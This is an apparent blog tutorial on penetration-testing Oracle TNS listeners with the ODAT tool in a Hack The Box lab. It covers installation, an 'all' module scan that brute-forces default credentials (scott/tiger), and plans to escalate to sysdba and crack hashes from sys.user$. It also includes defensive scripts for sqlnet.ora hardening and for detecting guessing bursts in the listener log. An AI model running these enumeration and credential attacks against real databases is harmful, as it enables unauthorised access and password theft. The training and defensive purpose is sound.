Oracle TNS Penetration Test Using ODAT

Mario Rufisanto
MII Cyber Security Consulting Services
4 min read · Jan 11, 2024

What is Oracle TNS?

The Oracle Transparent Network Substrate (TNS) server is a communication protocol that facilitates communication between Oracle databases and applications over networks. Initially introduced as part of the Oracle Net Services software suite, TNS supports various networking protocols between Oracle databases and client applications, such as IPX/SPX and TCP/IP protocol stacks. As a result, it has become a preferred solution for managing large, complex databases in the healthcare, finance, and retail industries. In addition, its built-in encryption mechanism ensures the security of data transmitted, making it an ideal solution for enterprise environments where data security is paramount.

Over time, TNS has been updated to support newer technologies, including IPv6 and SSL/TLS encryption, which makes it more suitable for the following purposes:

Furthermore, it can encrypt client-server communication as an additional layer of security above the TCP/IP layer. This helps protect the database architecture from unauthorized access and from attacks that try to capture or tamper with data in network traffic. It also gives database administrators and developers advanced tooling: comprehensive performance monitoring and analysis, error reporting and logging, workload management, and fault tolerance through database services.
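The protection described above only applies when the listener is actually configured to enforce it. The following script is an added example, not part of the original article or of any Oracle tooling: it parses a sqlnet.ora fragment and flags the settings that leave TNS negotiable down to cleartext, unauthenticated packets, or legacy password verifiers. The parameter names are real Oracle Net parameters; the two sample files and the audit function itself are constructed for this example.

```python
"""Audit a sqlnet.ora fragment for settings that weaken the TNS layer.

Hypothetical helper written for this article (not Oracle's own tooling).
Parameter names are genuine Oracle Net parameters; sample files are constructed.
"""

# Each rule: parameter name, predicate over the upper-cased value, recommended fix.
RULES = [
    ("SQLNET.ENCRYPTION_SERVER",
     lambda v: v == "REQUIRED",
     "set to REQUIRED so clients cannot negotiate an unencrypted session"),
    ("SQLNET.CRYPTO_CHECKSUM_SERVER",
     lambda v: v == "REQUIRED",
     "set to REQUIRED to enforce integrity checking of TNS packets"),
    ("TCP.VALIDNODE_CHECKING",
     lambda v: v == "YES",
     "set to YES and list permitted clients in TCP.INVITED_NODES"),
    ("SQLNET.ALLOWED_LOGON_VERSION_SERVER",
     lambda v: v.rstrip("A").isdigit() and int(v.rstrip("A")) >= 12,
     "set to 12 or higher to reject legacy (10g/11g) password verifiers"),
]


def parse_sqlnet(text):
    """Return {PARAM: VALUE} from sqlnet.ora-style 'KEY = VALUE' lines.

    Comments (#) are dropped; list values such as (AES256) lose their parentheses.
    """
    params = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line or "=" not in line:
            continue
        key, value = line.split("=", 1)
        params[key.strip().upper()] = value.strip().strip("()").strip().upper()
    return params


def audit(text):
    """Return a list of human-readable findings; an empty list means all rules pass."""
    params = parse_sqlnet(text)
    findings = []
    for key, passes, fix in RULES:
        value = params.get(key)
        if value is None:
            # Absent parameters fall back to Oracle defaults, which are permissive.
            findings.append(f"{key} missing (Oracle default applies): {fix}")
        elif not passes(value):
            findings.append(f"{key}={value}: {fix}")
    return findings


# Constructed sample: defaults left in place, the situation ODAT benefits from.
WEAK_SQLNET = """
# constructed sample, not a real deployment
SQLNET.ENCRYPTION_SERVER = ACCEPTED
SQLNET.ALLOWED_LOGON_VERSION_SERVER = 11
TCP.VALIDNODE_CHECKING = NO
"""

# Constructed sample: the same file after hardening.
HARDENED_SQLNET = """
SQLNET.ENCRYPTION_SERVER = REQUIRED
SQLNET.ENCRYPTION_TYPES_SERVER = (AES256)
SQLNET.CRYPTO_CHECKSUM_SERVER = REQUIRED
SQLNET.CRYPTO_CHECKSUM_TYPES_SERVER = (SHA256)
TCP.VALIDNODE_CHECKING = YES
TCP.INVITED_NODES = (10.0.0.10, 10.0.0.11)
SQLNET.ALLOWED_LOGON_VERSION_SERVER = 12a
"""

if __name__ == "__main__":
    for name, text in (("weak", WEAK_SQLNET), ("hardened", HARDENED_SQLNET)):
        print(f"[{name}] {len(audit(text))} finding(s)")
        for finding in audit(text):
            print("  -", finding)
```

Running it reports four findings for the weak file (cleartext still negotiable, no integrity checking, no node checking, legacy verifiers allowed) and none for the hardened one. The check is deliberately conservative: a parameter that is simply missing is reported, because Oracle's defaults (ACCEPTED for encryption, NO for node checking) are what make unauthenticated listener enumeration comfortable.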

Oracle Database Attacking Tool

Oracle Database Attacking Tool (ODAT) is an open-source penetration testing tool written in Python and designed to enumerate and exploit vulnerabilities in Oracle databases. It can be used to identify and exploit various security flaws in Oracle databases, including SQL injection, remote code execution, and privilege escalation.

Here’s how to set it up:

#!/bin/bash

sudo apt-get install libaio1 python3-dev alien python3-pip -y
git clone https://github.com/quentinhardy/odat.git
cd odat/
git submodule init
git submodule update
sudo apt install oracle-instantclient-basic oracle-instantclient-devel oracle-instantclient-sqlplus -y
pip3 install cx_Oracle
sudo apt-get install python3-scapy -y
sudo pip3 install colorlog termcolor pycryptodome passlib python-libnmap
sudo pip3 install argcomplete && sudo activate-global-python-argcomplete

After that, we can try to determine if the installation was successful by running the following command:

oqyu@htb[/htb]$ ./odat.py -h

usage: odat.py [-h] [--version]
{all,tnscmd,tnspoison,sidguesser,snguesser,passwordguesser,utlhttp,httpuritype,utltcp,ctxsys,externaltable,dbmsxslprocessor,dbmsadvisor,utlfile,dbmsscheduler,java,passwordstealer,oradbg,dbmslob,stealremotepwds,userlikepwd,smb,privesc,cve,search,unwrapper,clean}
...

 _  __   _  ___
/ \|  \ / \|_ _|
( o ) o ) o || |
\_/|__/|_n_||_|
-------------------------------------------
  _  __   _  ___
 / \| \ / \|_ _|
( o ) o ) o | | |
\_/racle |__/atabase |_n_|ttacking |_|ool
-------------------------------------------

By Quentin Hardy (quentin.hardy@protonmail.com or quentin.hardy@bt.com)
...SNIP...

Example of ODAT Implementation

ODAT boasts numerous modules for various functionalities. For instance, using the ‘all’ command allows users to run all modules, providing a comprehensive understanding of the toolkit’s capabilities.

For this example, we’ll be using a lab from Hack The Box to demonstrate.

oqyu@htb[/htb]$ ./odat.py all -s 10.129.24.217
[+] Checking if target 10.129.24.217:1521 is well configured for a connection...
[+] According to a test, the TNS listener 10.129.24.217:1521 is well configured. Continue...

...SNIP...

[!] Notice: 'outln' account is locked, so skipping this username for password################ | ETA: 00:09:00
[+] Valid credentials found: scott/tiger. Continue... ##################################### | ETA: 00:05:01
[!] Notice: 'xdb' account is locked, so skipping this username for password############################################################## | ETA: 00:00:59
100% |#########################################################################################################################################| Time: 00:24:40
[+] Accounts found on 10.129.24.217:1521/sid:XE:
scott/tiger

...SNIP...

After a certain amount of time, we’ll find a credential that we can use: “scott/tiger”. From here, we’ll be using SQL*Plus to interact with the Oracle database.
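The 24 minutes of guessing shown above leave a very recognisable trace on the server side: the listener log records one line per connection attempt, each carrying the client address, the requested service and a return code (0 for success, non-zero such as 12505/12514 for an unknown SID or service). The script below is an added example, not part of the article or of ODAT: it parses listener.log-style lines and flags any client host that opens an unusual number of connections within a short window, counting how many of them failed and how many different services were asked for. The log lines are constructed for this example, with the attacker's address and the SID names made up.

```python
"""Flag listener.log bursts typical of SID/credential guessing.

Hypothetical detection helper written for this article; not Oracle or ODAT code.
The sample log is constructed; hosts, SIDs and timestamps are invented.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# One 'establish' line from listener.log (text format):
# DD-MON-YYYY HH:MM:SS * (CONNECT_DATA=...) * (ADDRESS=(PROTOCOL=tcp)(HOST=ip)(PORT=n)) * establish * SERVICE * RC
LINE_RE = re.compile(
    r"^(?P<ts>\d{2}-[A-Z]{3}-\d{4} \d{2}:\d{2}:\d{2}) \* "
    r"\(CONNECT_DATA=.*?\) \* "
    r"\(ADDRESS=\(PROTOCOL=\w+\)\(HOST=(?P<host>[^)]+)\)\(PORT=\d+\)\) \* "
    r"(?P<action>\w+) \* (?P<svc>\S+) \* (?P<rc>\d+)$"
)


def parse_listener_log(text):
    """Return a list of connection events; lines of other shapes (service_update etc.) are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        events.append({
            "ts": datetime.strptime(m["ts"], "%d-%b-%Y %H:%M:%S"),
            "host": m["host"],
            "service": m["svc"],
            "rc": int(m["rc"]),
        })
    return events


def detect_bursts(events, window=timedelta(seconds=60), threshold=10):
    """Return {host: {connects, failures, services}} for hosts that reach
    `threshold` connections inside any `window`; figures are for the largest window seen."""
    by_host = defaultdict(list)
    for e in sorted(events, key=lambda e: e["ts"]):
        by_host[e["host"]].append(e)

    alerts = {}
    for host, evs in by_host.items():
        start = 0
        for end in range(len(evs)):
            # Slide the window start forward until it spans at most `window`.
            while evs[end]["ts"] - evs[start]["ts"] > window:
                start += 1
            count = end - start + 1
            if count >= threshold and (host not in alerts or count > alerts[host]["connects"]):
                span = evs[start:end + 1]
                alerts[host] = {
                    "connects": count,
                    "failures": sum(1 for e in span if e["rc"] != 0),
                    "services": len({e["service"] for e in span}),
                }
    return alerts


def _line(ts, host, sid, rc):
    """Build one constructed listener.log line in the format matched above."""
    return (f"{ts.strftime('%d-%b-%Y %H:%M:%S').upper()} * "
            f"(CONNECT_DATA=(SID={sid})(CID=(PROGRAM=)(HOST=__jdbc__)(USER=))) * "
            f"(ADDRESS=(PROTOCOL=tcp)(HOST={host})(PORT=43000)) * establish * {sid} * {rc}")


# Constructed sample: one benign client, one noisy client guessing SIDs every 2 s,
# plus a non-connection line the parser must ignore.
_base = datetime(2024, 1, 11, 10, 15, 0)
_lines = [_line(_base - timedelta(seconds=60), "10.0.0.20", "XE", 0),
          "11-JAN-2024 10:15:05 * service_update * XE * 0"]
for i in range(12):
    sid = "XE" if i >= 10 else f"GUESS{i}"          # invented SIDs, not a wordlist
    _lines.append(_line(_base + timedelta(seconds=2 * i), "10.10.14.5", sid, 0 if sid == "XE" else 12505))
_lines.append(_line(_base + timedelta(seconds=60), "10.0.0.20", "XE", 0))
SAMPLE_LOG = "\n".join(_lines)

if __name__ == "__main__":
    for host, info in detect_bursts(parse_listener_log(SAMPLE_LOG)).items():
        print(f"ALERT {host}: {info['connects']} connects, {info['failures']} failed, "
              f"{info['services']} distinct services in one window")
```

With the defaults (10 connections in 60 seconds) the noisy host is reported with 12 connects, 10 failures and 11 distinct service names, while the benign client, with two connections a couple of minutes apart, is not. A high ratio of non-zero return codes and many distinct service names from one source is the signature of sidguesser-style enumeration; a long run of successful connects to one service with short-lived sessions is what password guessing against a known SID looks like, and would need the database audit trail (ORA-01017 entries) rather than the listener log alone.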

If you come across the following error, “sqlplus: error while loading shared libraries: libsqlplus.so: cannot open shared object file: No such file or directory”, please execute the command below, taken from here.

oqyu@htb[/htb]$ sudo sh -c "echo /usr/lib/oracle/12.2/client64/lib > /etc/ld.so.conf.d/oracle-instantclient.conf";sudo ldconfig

Here, the user scott has no administrative privileges. However, we can try using this account to log in as the System Database Admin (sysdba), which would give us higher privileges. This only works when scott holds the appropriate privilege, which is typically granted by the database administrator or is an account the administrator uses directly.

From this point, we could retrieve the password hashes from the sys.user$ table and try to crack them offline. The query for this would look like the following:

References:
https://wirexsystems.com/resource/protocols/tns
https://github.com/quentinhardy/odat
https://www.whiteoaksecurity.com/blog/exploiting-oracle-databases-with-odat/
